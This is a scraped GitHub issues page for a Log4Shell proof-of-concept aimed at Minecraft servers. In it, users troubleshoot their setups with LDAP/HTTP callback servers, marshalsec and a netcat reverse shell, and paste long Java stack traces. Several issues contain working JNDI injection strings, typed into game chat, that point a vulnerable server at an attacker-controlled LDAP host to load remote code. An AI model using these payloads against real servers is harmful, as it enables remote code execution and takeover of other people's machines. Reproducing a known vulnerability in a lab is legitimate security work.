log4jminecraft's People
Contributors
Stargazers
Watchers
Forkers
dawidvanstraaten anarcypher syderal bluegizmo83 dedlad vigneshsahoo dmaina5054 fynewine scattypie mellob1989 realradioactive darkkalil fajrulfx dudy2292 multiwu elkozirro eljaviluki pawstar-lag sebas-eekhof alexshcer abdulalsadoun stabalmo almadrasa marozu4kas poleter achart403 interbiznw karthickshiva18 m1lc0lm silocityit lamatraca2 rbauchdo990 himdo rehanplayz aquilino fizikyadershchik bloxergamer robbyv2 lbladma ca4tuk ktsoev xenon007 jinyers mdziaulh trobbies ehlewis joblackpoc ahtesham007 ttvredez restfulhold03 tanjunhong chickenhelp tluffgg aslandn lexdacurro hckman-rwg iot-shaman savely22828 muzzman96log4jminecraft's Issues
"Reference Class Name: foo"
It might not be an issue of the POC, but I get this message whenever I try to use it with a Minecraft 1.15.2 server:
[18:40:51] [Server thread/INFO]: Reference Class Name: foo
๐คฏ
Ldap server to http server redirection error
I have followed all the steps correctly and have almost gotten there. I hosted a vulnerable minecraft server on my pc in the same network, connected to it, and ran the ${jndi:ldap://:port/log4jRCE} (not accurate) code in the minecraft chat. I get to see an ldap server reply thrice on my kali vm but nothing on the web server terminal and the netcat terminal window
Any fixes? Thanks.
error python3 jcomp_pyserv.py
Traceback (most recent call last):
File "jcomp_pyserv.py", line 9, in
subprocess.run(["javac", "Log4jRCE.java"])
File "/usr/lib/python3.8/subprocess.py", line 493, in run
with Popen(*popenargs, **kwargs) as process:
File "/usr/lib/python3.8/subprocess.py", line 858, in init
self._execute_child(args, executable, preexec_fn, close_fds,
File "/usr/lib/python3.8/subprocess.py", line 1704, in _execute_child
raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'javac'
The request does not reach the HTTP server.
Hello! Thank you very much for your work!
As shown in the video, I deployed both python codes on Ubuntu 20.04 LTS using the Linode service, everything worked and it was written in one terminal:
Listening on 0.0.0.0:1389
And in the other:
root@localhost:~/log4jminecraft# python3 jcomp_pyserv.py
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
I also created a Minecraft server on my PC at version 1.18.1(at first) and installed the Java Kit.
After that I changed the variable in server.properties:
online-mode=false
I need this so that I can log in to the server with TLauncher.
After that, I entered the command in minecraft:
${jndi:ldap://LINODE_SERVER_IP:1389/Log4JCE}
Nothing worked on version 1.18.1.
I also tried it on versions 1.17.1 and 1.8.8 (as in the video).
In these cases, the LDAP signal reaches the server:
But on the server with Minecraft there is a long error:
[13:27:52] [Server thread/INFO]: Done (0,720s)! For help, type "help" or "?"
[13:27:59] [Server thread/INFO]: maxet24[/192.168.56.1:29255] logged in with entity id 310 at (-245.78230860708862, 71.0, 115.72254226147197)
[13:27:59] [Server thread/INFO]: maxet24 joined the game
2021-12-19 13:29:20,809 ERROR An exception occurred processing Appender SysOut java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52)
at org.apache.logging.log4j.core.layout.AbstractStringLayout.toByteArray(AbstractStringLayout.java:45)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:111)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367)
at org.apache.logging.log4j.core.Logger.log(Logger.java:110)
at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011)
at net.minecraft.server.MinecraftServer.a(SourceFile:871)
at lx.a(SourceFile:782)
at lm.a(SourceFile:680)
at ie.a(SourceFile:37)
at ie.a(SourceFile:9)
at fh$1.run(SourceFile:13)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at g.a(SourceFile:44)
at net.minecraft.server.MinecraftServer.B(SourceFile:579)
at ko.B(SourceFile:299)
at net.minecraft.server.MinecraftServer.A(SourceFile:535)
at net.minecraft.server.MinecraftServer.run(SourceFile:451)
at java.base/java.lang.Thread.run(Thread.java:833)
2021-12-19 13:29:20,974 ERROR An exception occurred processing Appender File java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52)
at org.apache.logging.log4j.core.layout.AbstractStringLayout.toByteArray(AbstractStringLayout.java:45)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:111)
at org.apache.logging.log4j.core.appender.RollingRandomAccessFileAppender.append(RollingRandomAccessFileAppender.java:96)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367)
at org.apache.logging.log4j.core.Logger.log(Logger.java:110)
at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011)
at net.minecraft.server.MinecraftServer.a(SourceFile:871)
at lx.a(SourceFile:782)
at lm.a(SourceFile:680)
at ie.a(SourceFile:37)
at ie.a(SourceFile:9)
at fh$1.run(SourceFile:13)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at g.a(SourceFile:44)
at net.minecraft.server.MinecraftServer.B(SourceFile:579)
at ko.B(SourceFile:299)
at net.minecraft.server.MinecraftServer.A(SourceFile:535)
at net.minecraft.server.MinecraftServer.run(SourceFile:451)
at java.base/java.lang.Thread.run(Thread.java:833)
2021-12-19 13:29:21,141 ERROR An exception occurred processing Appender ServerGuiConsole java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52)
at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367)
at org.apache.logging.log4j.core.Logger.log(Logger.java:110)
at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011)
at net.minecraft.server.MinecraftServer.a(SourceFile:871)
at lx.a(SourceFile:782)
at lm.a(SourceFile:680)
at ie.a(SourceFile:37)
at ie.a(SourceFile:9)
at fh$1.run(SourceFile:13)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at g.a(SourceFile:44)
at net.minecraft.server.MinecraftServer.B(SourceFile:579)
at ko.B(SourceFile:299)
at net.minecraft.server.MinecraftServer.A(SourceFile:535)
at net.minecraft.server.MinecraftServer.run(SourceFile:451)
at java.base/java.lang.Thread.run(Thread.java:833)
[13:29:21] [Server thread/FATAL]: Error executing task
java.util.concurrent.ExecutionException: org.apache.logging.log4j.core.appender.AppenderLoggingException: An exception occurred processing Appender ServerGuiConsole
at java.base/java.util.concurrent.FutureTask.report(FutureTask.java:122) ~[?:?]
at java.base/java.util.concurrent.FutureTask.get(FutureTask.java:191) ~[?:?]
at g.a(SourceFile:45) [minecraft_server.1.8.8.jar:?]
at net.minecraft.server.MinecraftServer.B(SourceFile:579) [minecraft_server.1.8.8.jar:?]
at ko.B(SourceFile:299) [minecraft_server.1.8.8.jar:?]
at net.minecraft.server.MinecraftServer.A(SourceFile:535) [minecraft_server.1.8.8.jar:?]
at net.minecraft.server.MinecraftServer.run(SourceFile:451) [minecraft_server.1.8.8.jar:?]
at java.base/java.lang.Thread.run(Thread.java:833) [?:?]
Caused by: org.apache.logging.log4j.core.appender.AppenderLoggingException: An exception occurred processing Appender ServerGuiConsole
at org.apache.logging.log4j.core.appender.DefaultErrorHandler.error(DefaultErrorHandler.java:73) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:101) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367) [minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.Logger.log(Logger.java:110) [minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011) [minecraft_server.1.8.8.jar:?]
at net.minecraft.server.MinecraftServer.a(SourceFile:871) ~[minecraft_server.1.8.8.jar:?]
at lx.a(SourceFile:782) ~[minecraft_server.1.8.8.jar:?]
at lm.a(SourceFile:680) ~[minecraft_server.1.8.8.jar:?]
at ie.a(SourceFile:37) ~[minecraft_server.1.8.8.jar:?]
at ie.a(SourceFile:9) ~[minecraft_server.1.8.8.jar:?]
at fh$1.run(SourceFile:13) ~[minecraft_server.1.8.8.jar:?]
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539) ~[?:?]
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[?:?]
at g.a(SourceFile:44) ~[minecraft_server.1.8.8.jar:?]
... 5 more
Caused by: java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52) ~[minecraft_server.1.8.8.jar:?]
at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.core.Logger.log(Logger.java:110) ~[minecraft_server.1.8.8.jar:?]
at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011) ~[minecraft_server.1.8.8.jar:?]
at net.minecraft.server.MinecraftServer.a(SourceFile:871) ~[minecraft_server.1.8.8.jar:?]
at lx.a(SourceFile:782) ~[minecraft_server.1.8.8.jar:?]
at lm.a(SourceFile:680) ~[minecraft_server.1.8.8.jar:?]
at ie.a(SourceFile:37) ~[minecraft_server.1.8.8.jar:?]
at ie.a(SourceFile:9) ~[minecraft_server.1.8.8.jar:?]
at fh$1.run(SourceFile:13) ~[minecraft_server.1.8.8.jar:?]
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539) ~[?:?]
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[?:?]
at g.a(SourceFile:44) ~[minecraft_server.1.8.8.jar:?]
... 5 more
[13:30:17] [Server thread/INFO]: maxet24 lost connection: TextComponent{text='Disconnected', siblings=[], style=Style{hasParent=false, color=null, bold=null, italic=null, underlined=null, obfuscated=null, clickEvent=null, hoverEvent=null, insertion=null}}
Nothing reached the HTTP server.
Error while running log4j.py
When I try to run the file, I get the following error:
I tried to install the script on linux subsystem for windows (WSL)
Could not find or load main class marshalsec.jndi.LDAPRefServer
fatal: destination path 'marshalsec' already exists and is not an empty directory.
['src', 'LICENSE.txt', '.gitignore', 'README.md', 'marshalsec.pdf', 'pom.xml', '.git']
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Error: Could not find or load main class marshalsec.jndi.LDAPRefServer
Caused by: java.lang.ClassNotFoundException: marshalsec.jndi.LDAPRefServer
I don't know why I am getting this error please help! I just installed all the stuff on a Kali virtuall machine.
"javac" not found
not able to create netcat reverse shell //// command not working in MC chat
ldap server can't reach http server
ldap and http are on the same server. I can access http server cia the web (it shows all files and I can download them), but ldap connections doesn't make it to the http.
Writing in chat:
${jndi:ldap://xxx.xxx.xxx.xxx:1389/Log4jRCE}
gives to the console:
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.